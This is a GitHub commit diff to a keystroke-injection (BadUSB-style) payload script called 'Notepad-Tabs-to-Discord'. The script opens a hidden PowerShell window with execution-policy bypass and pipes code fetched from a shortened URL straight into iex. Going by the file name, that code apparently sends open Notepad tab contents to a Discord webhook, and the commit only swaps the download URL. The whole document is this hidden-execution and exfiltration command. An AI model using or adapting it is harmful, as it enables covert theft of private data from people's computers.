Update Notepad-Tabs-to-Discord.txt

This commit is contained in:
egieb
2024-02-29 12:11:01 +00:00
committed by GitHub
parent 4d614ab8c6
commit 5865e662df

View File

@@ -14,7 +14,7 @@ REM open powershell (remove "-W H" to show the window)
DELAY 1000
GUI r
DELAY 750
STRING powershell -NoP -Ep Bypass -W H -C $dc='DISCORD_WEBHOOK_HERE'; irm https://is.gd/bw_bh_to_dc | iex
STRING powershell -NoP -Ep Bypass -W H -C $dc='DISCORD_WEBHOOK_HERE'; irm https://is.gd/bw_nptabs_to_dc | iex
ENTER